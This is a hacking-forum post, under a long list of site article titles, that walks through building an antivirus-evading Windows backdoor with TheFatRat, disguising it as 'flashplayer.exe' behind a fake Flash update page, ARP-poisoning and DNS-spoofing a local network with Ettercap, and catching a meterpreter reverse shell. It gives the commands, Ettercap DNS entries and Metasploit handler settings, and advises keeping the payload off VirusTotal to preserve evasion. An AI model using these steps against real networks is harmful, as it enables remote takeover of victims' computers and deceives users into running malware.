Best Telegram Programming Groups For Coders &Developers   It Wasn’t Me - Secure Your Account   Mr.Robot All Seasons 1,2,3 Full | Free Torrent Download   Mr.Robot All Seasons 1,2,3,4 Full | Watch Online [FREE]   5 Tips Will Keep You Safe During Christmas Holiday’s Online Shopping   You Can Get All Adobe Apps For $30 a Month Right Now   How To Wipe An iPhone Clean (ERASE) Before Selling?   Programming Languages To Learn To Be An Expert Hacker!   Cybercriminals exchange tips on underground forums about avoiding arrests   A comprehensive look into emerging Signal encrypted messaging application   A Detailed Comparison of WhatsApp, Telegram & Signal   How Telegram End-to-end Encryption Works To Provide Security ?   Flubot Malware is Spreading Quickly Through Android Devices   WhatsApp End-to-End Encryption and its Privacy Importance - Alternatives,Signal & Telegram   What is Credit Card Skimming And How To Protect Yourself From it ?   Where to hire react programmer and 3 essential skills to look for   Top 8 Basic Google Search Dorks [Live Examples]   [Penetration Testing] Top 70 Most Interview Questions   Why VPN Is Necessary ? [Detailed Guide]   Top 10 Dangerous Viruses Of All Times   List Of Common HTTP Error Status Codes   “Hello World!” Program In Different Programming Languages   100 Basic Computer Related G.K. Questions   Email Security - Tips And Tricks   Fonts Hub Collection (Free Design Resources)   Top 8 Softwares Free Download - No Credit Card Needed [2022 Update]   Shortcomings That Leads An Entrepreneur Towards Failure   5 Basic Steps To Protect Your Personal Data Online   What is Intel SGX and What are the Benefits ?   15 Things You Need to Know About Maintaining The Logs   How to think like a programmer - lessons in problem solving   How To Get Voice Like Anonymous Voice   Life Story of Microsoft Founder Bill Gates - Documentary   Own Private Search Engine in Linux Will Save Our Privacy   Best Etcher alternatives to Create Bootable USB   Music For Programming - Coding Music / Hacking Music   School Management Software v3.1 Premium + Crack   JavaFX Chat Client/Server + Source Code   Top 25 Keyword Research Tools [Search Engine Optimization]   A Quick SEO Checklist - 2023 Update   Online Domain Authority (DA) Rank Checker Websites   33 Things In SEO For Which Google Will Give Your Student Blog High Positions   How to Close the Site from indexing using robots.txt   10 SEO Tools all Small Businesses Need in 2023   Earth Rise Application + Code   Animation along a path + Code   Zen Pong Game in Java Language + Code   Simple Flying Bird Game + Code Files   Game Snake Simple + Code Files   The Space 'Sun & Earth' | HTML,CSS,JavaScript   File System in Web (Explorer in Windows and Finder in OSX)   Admin Dashboard Template built using Bootstrap + Code   Website Template For Admin Dashboard + Code   Youtube Playlist Downloader Script   How To Create A Stopwatch In Python   Python TicTacToe with Tk and minimax AI   Deskreen turns any device with a web browser into a secondary screen for your computer   Download Algorithms Book | Dummies Store   OSI Model And TCP/IP Model   How to Fix SSH Failed Permission Denied (publickey,gssapi-keyex,gssapi-with-mic)   What Is Load Balancing? Definition and How It Works   How to Setup FTP Server on Your Raspberry Pi   Download Windows 10 Lite Edition x64 | Direct Link   How To Recover Permanently Deleted Files In Windows 10 ?   How to make Fake Error Message Script in Windows   20 Essential Windows keyboard Shortcuts that will make you forget your mouse   How To Fix The DLL Missing Error In Windows 7 ?   Create Hotspot on Windows 10 in 6 steps   Download Microsoft Office Professional Plus 2016   Download DriverPack Solution Offline | Full   How To Create Simple And Password Protected ZIP File in Linux   2 Ways To Save Terminal Output of a Command in Linux   6 Best Tools to Monitor Disk IO Performance in Linux   Top 15 Best Websites (Blogs) to Learn Linux Online   How to Delete files older than 30 Days in Linux   What is the difference between apt and apt-get command   Fail2Ban Installation & Setup: Ubuntu, CentOS, Fedora & Debian   How to List Running Processes in Linux   How to Use the who Command in Linux with Examples   FOREMOST - Recover Permanently Deleted Files Easily in Kali Linux   Funny Linux Commands to Try   Command line interface guidelines, to help you write better command-line programs ...   How to Install Google Chrome Web Browser on Ubuntu 20.04   Learn Adobe Photoshop | 33 Episode Course   Window Privilege Escalation: Automated Script   Linux Privilege Escalation: Automated Script   How To Retrieve & Decrypt Stored Passwords in Firefox & Chrome Remotely   ACLight: An Advanced Privileged Account Discovery Tool   How to change Lock Screen Background on Kali Linux XFCE   Best 20 Kali Linux Tools For Hacking And Penetration Testing   How to Run Windows Application and Games on Kali Linux   How to run C and C++ programs in Kali Linux   Control Kali Linux PC From any Mobile or Tablet   How to Enable root User Account in Kali Linux   How to Configure Static IP address in Kali Linux   Bash vs ZSH in Kali Linux   [Solved] E: Unable to locate package in Kali Linux   Hosting a Local Website with Domain Name on Kali Linux over WiFi   Install Docker in Kali Linux and Run Other OS   How to Install Kali Linux | A Total Guide to Install Kali Linux   NetHunter Rootless - Official Kali NetHunter for non rooted phones   How to set up own VPN server in 10 minutes on Kali Linux using OpenVPN   Configuring The ProxyChains   Install Python3 in Kali Linux   TempoMail - Command Line Temporary Email in Linux   NIPE - Fully Anonymize Total Kali Linux System   How to Install Google Chrome & Chromium on Kali Linux [Official Method]   15 Best Laptops For Kali Linux & Cyber Security - Check This Before Buy   Volatolity - Digial Forensic Testing of RAM on Kali Linux   Limit the Internet Speed of LAN Users [Evil Limiter]   Find Virtual Machine IP Through Kali Linux - 3 Methods   Privilege Escalation with PowerShell Empire and SETOOLKIT [Kali Linux]   How to use kill, pkill and killall Commands to Kill any Linux Process   20 Useful Tar Commands For Extraction and Compression   Create a Fake AP with DNSMASQ and HOSTAPD [Kali Linux]   How to Fully Anonymize Your Linux System with Tor using Nipe   Hack Windows/Linux using ARCANUS Framework – 100% FUD   Simple and Target Mac Flooding - Kali Linux   Get Free Kali Linux on AWS with Public IP - Real Time Penetration Testing   What’s the difference Between Tails and Tor browser?   Does Tor Hide you From Your ISP? Should I surf internet using Tor ?   Wireshark for Pentester: Decrypting RDP Traffic   Exploit Wi-Fi Vulnerabilities with Routersploit on Termux and Linux   Man in The Middle Attack & How To Prevent it   Masscan - 1000 Times Faster Than NMAP   Wireshark - Shark in Wires | Network Protocol Analyzer in Kali Linux   Wifite - Easy Automated Wireless Attack   WiFi-Pumpkin 3 - Dangerous Access Point   Evil Twin Attack with DNSMASQ - Wireless WPA2-PSK Cracking   Sniffing with Rogue Access Point [DNSMASQ and TCPFLOW]   Hack Wi-Fi Settings of Windows Machine Remotely [After Meterpreter]   Wi-Fi deauthentication attack against 802.11 protocol   Bypass Hidden SSID in a Wireless Network [Full Proof Method]   Crack WPA/WPA2-PSK using Aircrack-ng and Hashcat   Crack WPA2-PSK Wi-Fi with automated python script - FLUXION PART 1   Set Default Version of Python : [SOLVED] update-alternatives: error: no alternatives for p   Python Scripting: Information Gathering and Automating Ethical Hacking   15 Essential Meterpreter Commands Everyone Should Know   Find Vulnerable Webcams with Shodan [Metasploit Framework]   TCP & SYN Scanning with Metasploit Framework without NMAP   Meterpreter Useful Top 60 Commands List   The Web Application Hacker's Handbook 2   Hacking GPS Book   MadCam - Termux Hack Front camera by Sending link   How to Download Files In Termux   IPdrone Termux - Find Location of Person it IP in Termux   ReconDog Termux - Best Reconnaissance Tool For Termux   Termux SSH: Use Termux in Windows Using SSH Server   How to Install and Use Fsociety-Tool In Termux   Termux-YTD : Download Youtube Videos with Termux   Use CMatrix Package Like a Pro   L3MON - Access Android Devices Remotely   Hack Android using Metasploit over LAN/WAN   Ghost Framework - Control Android Devices Remotely   Top 10 Vulnerable Android Applications [Penetration Testing]   Find Hidden Subdomains on Any Website with Subfinder   Blind Sql Injection with Regular Expressions Attack   Useful Google Dorks For Bug Bounty Hunters   HTML5 Security CheatSheet - What your browser does when you look away...   30,000 Sites Is In RISK, The Plus Addons For Elementor WordPress Plugin Hacked   WPScan - Find Vulnerabilities in WordPress Websites on Kali Linux   Wapiti - Automated Vulnerability Scanner   Generate 100% FUD Backdoor with TheFatRat - Windows 10 Exploitation   TheFatRat hacking tool to create undetectable backdoors   How to Make a Keylogger in Python + Code   How to create a keylogger in PowerShell ?   Backdoor Program using Python (Remote Access Explain)   Man in the Middle Attack with Websploit Framework   Hack Windows 10 Remotely over WAN with Metasploit [No Port Forwarding]   15 Powerful Gadgets For Ethical Hackers | Hardware Tools for Hackers   Find Vulnerabilities using NMAP Scripts (NSE)   Free Vulnerability Database And Resources   Firefox Browser Vulnerable to (MITM) Man-in-the-Middle Attack   Find Vulnerabilities in Military Networks By Participating Hack The Army Bug Bounty Progr. 

x32x01

ADMINISTRATOR

As you all knows, Windows 10 is the latest edition of Microsoft having great security features but what if someone send a trojan/virus/backdoor/payload which is 100% FUD (Fully Undetectable) ?

So basically, with the help of TheFatRat, you can easily develop a Trojan or backdoor and perform various post exploitation methods like Browser Hijacking, DDL Hacking, Windows Privilege Escalation etc and that generated payload will be 100% fully undetectable (FUD).

You can easily create a backdoor for Windows, Android and for Mac Operating system too. This tool will generate a payload in such a way that, it will bypass all Anti-Virus Software protection.

So with the help of Metasploit Framework, you can easily create a session between an attacker and a target.

TheFatRat tool is developed in C Language and in C language, Viruses won’t flag them from Anti-Viruses.

Requirements
  • Kali Linux 2017.1 (Latest Version)
  • Metasploit Framework (Inbuilt Installed)
  • TheFatRat Package (Download it from Github)
Here is the complete scenario
  • Target Machine – Windows 10
  • Attacking Machine – Kali Linux 2017.1.
Installation
To install TheFatRat, you an use Github repository and by typing below command will automatically download all files of TheFatRat from Github.
Code:
git clone https://github.com/Screetsec/TheFatRat.git


After completion of this, you need to run setup.sh file and before to run setup.sh, you need to change the permissions of setup.sh file by typing below command.
Code:
chmod +x setup.sh


Now in next step, you directly execute the setup.sh file by typing “./setup.sh” which will check all dependencies and will also automatically install the missing dependencies as per below screenshot.


Now you can simply type “fatrat” in your terminal and you’ll see a presented screen where it will show all the Menus from 01 to 16.


In next step, please type “6” to create a FUD(Fully Undetectable) Backdoor with Pwnwinds, which will create a .exe file.


After that, you need to type “2“, which will finally create a .exe file with the help of C# and Powershell.


Now you need to enter your local IP address which you can easily check it through by typing “ifconfig” command in other terminal. So in our case, LHOST will be 192.168.179.143 and LPORT is 4444.

And after that you need to type the file name of the backdoor which it will create at the end.


In last step, you need to assign the payload, you can choose any payload but the best one is “windows/meterepreter/reverse_tcp” by typing 3 as per above screenshot.


Within a span of 1-2 minutes, it will create a backdoor with filename “flashplayer.exe” in the /TheFatRat/output directory.

Now we have created an executable. The target’s Anti-Virus software will not have a signature for it until its updated into the database allowing us to sleekly bypass the targets Anti-Virus software.

Now we have our payload we now need to set up a listener but before to set up a listener you need to start your Apache service so that you can poison your whole network with the help of Ettercap.

So, the steps are
  • Create a fake index.html page similar to “Adobe Flash Player Missing” and put your backdoor behind that page.
  • Start your Apache Service
  • Run Ettercap and start ARP poisoning.
  • Start the Listener with the help of Metasploit
To start the Apache service, please type below command:
Code:
service apache2 start


Now move onto /var/www/html location, create an index.html file and place your backdoor file (flashplayer.exe) in same directory.

Here’s the code which you can use to put in your index.html and don’t forget to change the link URL with your local interface IP address.


In next step, we have to configure the Ettercap configuration and for this, you need to edit two files i.e. etter.conf and etter.dns.

The default location for both files are /etc/ettercap/etter.conf and /etc/ettercap/etter.dns

First open etter.conf file with the help of any text editor, here we used gedit, so the command will be “gedit /etc/ettercap/etter.conf” and edit two lines of code

Configure the ec_uid and ec_gid = 0 if not so. You need root privileges to configure interfaces, once they are done by Ettercap, then drops privileges, to whom?..

You tell that: 0=root, 65535 = nobody.


In the same file, uncomment the four commented lines following the statement:

if you use iptables and if you use ipchains by removing the two bottom comment hashes you see below:


Now open etter.dns file, In this step, we want to forward all requests to your LHOST IP address:

Your LHOST IP is 192.168.179.143 so the code is

* A 192.168.179.143
*.google.com A 192.168.179.143
google.com A 192.168.179.143
google.co.in A 192.168.179.143
facebook.com A 192.168.179.143

This etter.dns file is the hosts file and is responsible for redirecting specific DNS requests. Basically, if the target enters facebook.com they will be redirected to Facebook’s website, but this file can change all of that. This is where the magic happens.


Now type “ettercap -G” in your terminal which opens Ettercap in Graphical Mode and start Unified sniffing.


Here you need to select the interface, in our case, we selected eth0. You can find out which interface is connected to the internet by typing in terminal ifconfig and seeing which interface gives you an IP address.


Now we want to scan for targets on our network and pick one. To do this, go to Hosts > Scan for hosts and wait until it does the scan. It should only take a few seconds depending on the size of your network.


So we’ve dealt with the scanning but how do we see our targets? Well, go back to Hosts and select Host list to see all the targets that Ettercap has found.


Now what we want to do is add our victim machine to Target 2 and our network gateway to Target 1 but first we need to know both of their IP addresses.

To find out our victim’s IP address, we first need to know who we are attacking, and we can do so using nmap to find the information we need on the target machine.


Once you are sure who your victim is, select their IP address from the host list in Ettercap and choose Add to Target 2.

Now you need to find your gateway IP address (your router). To do this, open Terminal and type route -n. Now select the gateway IP from the host list and choose Add to Target 1.

192.168.179.2 – Gateway – Add to Target 1
192.168.179.142 – Victim’s IP – Add to Target 2


Now that we have both Targets set to our victim and gateway, we can proceed to the attack.

Go to the MITM tab and select ARP poisoning.


Choose Sniff remote connections and press OK.


Now go to Plugins > Manage the plugins and double click dns_spoof to activate that plugin.


The final thing left to do here is to start the attack. Go back to Ettercap and select Start > Start sniffing and that should do it.

Now every time the victim visits any website, they will be redirected to the fancy and inconspicuous page below. You can see how this can be extremely malicious, since the attacker could write a script that fetches the requested page immediately and sets up the etter.dns file.


In same time, we also need to setup a listener with the help of Metasploit Framework, to do this, please type “msfconsole” in your terminal which opens Metasploit Framework.


The exploit which we’ll use is “exploit/multi/handler” and to use this exploit, type below command.
Code:
use exploit/multi/handler


After that, you’ve to set the payload which is,
Code:
set payload windows/meterpreter/reverse_tcp


Now set your LHOST and LPORT which you used the same while configuring TheFatRat and finally run the exploit.

As you can see from the screen shots below, we now have a reverse connection with the target machine which is Windows 10 in our case.

Type “sysinfo” to see the information about the target.


To see all running processes in target’s machine, type “ps -ax“.


To see the backdoor’s process ID, type “getpid“. You can also enters into Command Shell mode by just typing “shell“.


Here you see the prompt of Windows 10 machine.


To move the current session into background, type “background” in same terminal.


You can explore more commands of meterpreter by just typing “?” in your same terminal which lists you more commands which you can easily perform with your target.

This is how we performed MITM attack with the help of TheFatRat, Ettercap and Metasploit Framework. This article is only for educational purposes, use at your own risk and please don’t upload any backdoor or payload to virustotal.com and if you really want to scan your backdoor, you can use nodistribute.com.

For more info about TheFatRat, please visit to Github Link.
 

Attachments :

  • TheFatRat-Files-iTabCode.zip
     5.2 KB · Views: 11
Top